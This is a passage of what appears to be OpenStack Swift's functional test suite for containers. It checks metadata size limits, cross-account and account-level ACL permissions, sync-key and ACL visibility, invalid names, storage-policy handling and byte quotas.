resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 204)
# this POST includes metadata size that is over limit
headers['X-Container-Meta-k'] = \
'x' * (self.max_meta_overall_size - size)
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 400)
# this POST would be ok and the aggregate backend metadata
# size is on the border
headers = {'X-Container-Meta-k':
'y' * (self.max_meta_overall_size - size - 1)}
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 204)
# this last POST would be ok by itself but takes the aggregate
# backend metadata size over limit
headers = {'X-Container-Meta-k':
'z' * (self.max_meta_overall_size - size)}
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 400)
def test_public_container(self):
if tf.skip:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name)
return check_response(conn)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '), err)
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Read': '.r:*,.rlistings'})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get)
resp.read()
self.assertEqual(resp.status, 204)
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, 'X-Container-Read': ''})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '), err)
def test_cross_account_container(self):
if tf.skip or tf.skip2:
raise SkipTest
# Obtain the first account's string
first_account = ['unknown']
def get1(url, token, parsed, conn):
first_account[0] = parsed.path
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get1)
resp.read()
# Ensure we can't access the container with the second account
def get2(url, token, parsed, conn):
conn.request('GET', first_account[0] + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 403)
# Make the container accessible by the second account
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[1],
'X-Container-Write': tf.swift_test_perm[1]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can now use the container with the second account
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 204)
# Make the container private again
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, 'X-Container-Read': '',
'X-Container-Write': ''})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can't access the container with the second account again
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 403)
def test_cross_account_public_container(self):
if tf.skip or tf.skip2:
raise SkipTest
if tf.in_process:
tf.skip_if_no_xattrs()
# Obtain the first account's string
first_account = ['unknown']
def get1(url, token, parsed, conn):
first_account[0] = parsed.path
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get1)
resp.read()
# Ensure we can't access the container with the second account
def get2(url, token, parsed, conn):
conn.request('GET', first_account[0] + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 403)
# Make the container completely public
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Read': '.r:*,.rlistings'})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can now read the container with the second account
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 204)
# But we shouldn't be able to write with the second account
def put2(url, token, parsed, conn):
conn.request('PUT', first_account[0] + '/' + self.name + '/object',
'test object', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put2, use_account=2)
resp.read()
self.assertEqual(resp.status, 403)
# Now make the container also writable by the second account
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[1]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can still read the container with the second account
resp = retry(get2, use_account=2)
resp.read()
self.assertEqual(resp.status, 204)
# And that we can now write with the second account
resp = retry(put2, use_account=2)
resp.read()
self.assertEqual(resp.status, 201)
def test_nonadmin_user(self):
if tf.skip or tf.skip3:
raise SkipTest
if tf.in_process:
tf.skip_if_no_xattrs()
# Obtain the first account's string
first_account = ['unknown']
def get1(url, token, parsed, conn):
first_account[0] = parsed.path
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get1)
resp.read()
# Ensure we can't access the container with the third account
def get3(url, token, parsed, conn):
conn.request('GET', first_account[0] + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get3, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Make the container accessible by the third account
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can now read the container with the third account
resp = retry(get3, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
# But we shouldn't be able to write with the third account
def put3(url, token, parsed, conn):
conn.request('PUT', first_account[0] + '/' + self.name + '/object',
'test object', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put3, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Now make the container also writable by the third account
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can still read the container with the third account
resp = retry(get3, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
# And that we can now write with the third account
resp = retry(put3, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
@requires_acls
def test_read_only_acl_listings(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list containers
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# read-only can list containers
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.name, listing)
# read-only can not create containers
new_container_name = str(uuid4())
resp = retry(put, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# but it can see newly created ones
resp = retry(put, new_container_name, use_account=1)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(new_container_name, listing)
@requires_acls
def test_read_only_acl_metadata(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def post(url, token, parsed, conn, name, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
return check_response(conn)
# add some metadata
value = str(uuid4())
headers = {'x-container-meta-test': value}
resp = retry(post, self.name, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# cannot see metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# read-only can NOT write container metadata
new_value = str(uuid4())
headers = {'x-container-meta-test': new_value}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# read-only can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
@requires_acls
def test_read_write_acl_listings(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
def post(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list containers
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list containers
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.name, listing)
# can create new containers
new_container_name = str(uuid4())
resp = retry(put, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(new_container_name, listing)
# can also delete them
resp = retry(delete, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertNotIn(new_container_name, listing)
# even if they didn't create them
empty_container_name = str(uuid4())
resp = retry(put, empty_container_name, use_account=1)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(delete, empty_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
@requires_acls
def test_read_write_acl_metadata(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def post(url, token, parsed, conn, name, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
return check_response(conn)
# add some metadata
value = str(uuid4())
headers = {'x-container-meta-test': value}
resp = retry(post, self.name, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# cannot see metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# read-write can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# read-write can also write container metadata
new_value = str(uuid4())
headers = {'x-container-meta-test': new_value}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# and remove it
headers = {'x-remove-container-meta-test': 'true'}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertIsNone(resp.getheader('X-Container-Meta-Test'))
@requires_acls
def test_admin_acl_listing(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
def post(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list containers
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant admin access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list containers
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.name, listing)
# can create new containers
new_container_name = str(uuid4())
resp = retry(put, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(new_container_name, listing)
# can also delete them
resp = retry(delete, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertNotIn(new_container_name, listing)
# even if they didn't create them
empty_container_name = str(uuid4())
resp = retry(put, empty_container_name, use_account=1)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(delete, empty_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
@requires_acls
def test_admin_acl_metadata(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def post(url, token, parsed, conn, name, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
return check_response(conn)
# add some metadata
value = str(uuid4())
headers = {'x-container-meta-test': value}
resp = retry(post, self.name, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# cannot see metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# can also write container metadata
new_value = str(uuid4())
headers = {'x-container-meta-test': new_value}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# and remove it
headers = {'x-remove-container-meta-test': 'true'}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertIsNone(resp.getheader('X-Container-Meta-Test'))
@requires_acls
def test_protected_container_sync(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def post(url, token, parsed, conn, name, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
return check_response(conn)
# add some metadata
value = str(uuid4())
headers = {
'x-container-sync-key': 'secret',
'x-container-meta-test': value,
}
resp = retry(post, self.name, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# but not sync-key
self.assertIsNone(resp.getheader('X-Container-Sync-Key'))
# and can not write
headers = {'x-container-sync-key': str(uuid4())}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# but not sync-key
self.assertIsNone(resp.getheader('X-Container-Sync-Key'))
# sanity check sync-key w/ account1
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
# and can write
new_value = str(uuid4())
headers = {
'x-container-sync-key': str(uuid4()),
'x-container-meta-test': new_value,
}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1) # validate w/ account1
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# but can not write sync-key
self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
# grant admin access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# admin can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# and ALSO sync-key
self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
# admin tester3 can even change sync-key
new_secret = str(uuid4())
headers = {'x-container-sync-key': new_secret}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Sync-Key'), new_secret)
@requires_acls
def test_protected_container_acl(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def post(url, token, parsed, conn, name, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
return check_response(conn)
# add some container acls
value = str(uuid4())
headers = {
'x-container-read': 'jdoe',
'x-container-write': 'jdoe',
'x-container-meta-test': value,
}
resp = retry(post, self.name, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# but not container acl
self.assertIsNone(resp.getheader('X-Container-Read'))
self.assertIsNone(resp.getheader('X-Container-Write'))
# and can not write
headers = {
'x-container-read': 'frank',
'x-container-write': 'frank',
}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
# but not container acl
self.assertIsNone(resp.getheader('X-Container-Read'))
self.assertIsNone(resp.getheader('X-Container-Write'))
# sanity check container acls with account1
resp = retry(get, self.name, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
# and can write
new_value = str(uuid4())
headers = {
'x-container-read': 'frank',
'x-container-write': 'frank',
'x-container-meta-test': new_value,
}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=1) # validate w/ account1
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# but can not write container acls
self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
# grant admin access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# admin can read container metadata
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
# and ALSO container acls
self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
# admin tester3 can even change container acls
new_value = str(uuid4())
headers = {
'x-container-read': '.r:*',
}
resp = retry(post, self.name, headers=headers, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get, self.name, use_account=3)
resp.read()
self.assertEqual(resp.status, 204)
self.assertEqual(resp.getheader('X-Container-Read'), '.r:*')
def test_long_name_content_type(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
container_name = 'X' * 2048
conn.request('PUT', '%s/%s' % (parsed.path, container_name),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(resp.getheader('Content-Type'),
'text/html; charset=UTF-8')
def test_null_name(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/abc%%00def' % parsed.path, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
if (tf.web_front_end == 'apache2'):
self.assertEqual(resp.status, 404)
else:
self.assertEqual(resp.read(), 'Invalid UTF8 or contains NULL')
self.assertEqual(resp.status, 412)
def test_create_container_gets_default_policy_by_default(self):
try:
default_policy = \
tf.FunctionalStoragePolicyCollection.from_info().default
except AssertionError:
raise SkipTest()
def put(url, token, parsed, conn):
# using the empty storage policy header value here to ensure
# that the default policy is chosen in case policy_specified is set
# see __init__.py for details on policy_specified
conn.request('PUT', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token, 'X-Storage-Policy': ''})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status // 100, 2)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
default_policy['name'])
def test_error_invalid_storage_policy_name(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
resp = retry(put, {'X-Storage-Policy': uuid4().hex})
resp.read()
self.assertEqual(resp.status, 400)
@requires_policies
def test_create_non_default_storage_policy_container(self):
policy = self.policies.exclude(default=True).select()
def put(url, token, parsed, conn, headers=None):
base_headers = {'X-Auth-Token': token}
if headers:
base_headers.update(headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
base_headers)
return check_response(conn)
headers = {'X-Storage-Policy': policy['name']}
resp = retry(put, headers=headers)
resp.read()
self.assertEqual(resp.status, 201)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
# and test recreate with-out specifying Storage Policy
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 202)
# should still be original storage policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
# delete it
def delete(url, token, parsed, conn):
conn.request('DELETE', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 204)
# verify no policy header
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertIsNone(headers.get('x-storage-policy'))
@requires_policies
def test_conflict_change_storage_policy_with_put(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
policy = self.policies.select()
resp = retry(put, {'X-Storage-Policy': policy['name']})
resp.read()
self.assertEqual(resp.status, 201)
# can't change it
other_policy = self.policies.exclude(name=policy['name']).select()
resp = retry(put, {'X-Storage-Policy': other_policy['name']})
resp.read()
self.assertEqual(resp.status, 409)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
# still original policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
@requires_policies
def test_noop_change_storage_policy_with_post(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
policy = self.policies.select()
resp = retry(put, {'X-Storage-Policy': policy['name']})
resp.read()
self.assertEqual(resp.status, 201)
def post(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# attempt update
for header in ('X-Storage-Policy', 'X-Storage-Policy-Index'):
other_policy = self.policies.exclude(name=policy['name']).select()
resp = retry(post, {header: other_policy['name']})
resp.read()
self.assertEqual(resp.status, 204)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
# still original policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
def test_container_quota_bytes(self):
if 'container_quotas' not in cluster_info:
raise SkipTest('Container quotas not enabled')
if tf.in_process:
tf.skip_if_no_xattrs()
def post(url, token, parsed, conn, name, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, name: value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
# set X-Container-Meta-Quota-Bytes is 10
resp = retry(post, 'X-Container-Meta-Quota-Bytes', '10')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
# confirm X-Container-Meta-Quota-Bytes
self.assertEqual(resp.getheader('X-Container-Meta-Quota-Bytes'), '10')
def put(url, token, parsed, conn, data):
conn.request('PUT', parsed.path + '/' + self.name + '/object',
data, {'X-Auth-Token': token})
return check_response(conn)
# upload 11 bytes object
resp = retry(put, '01234567890')
resp.read()
self.assertEqual(resp.status, 413)
# upload 10 bytes object
resp = retry(put, '0123456789')
resp.read()
self.assertEqual(resp.status, 201)
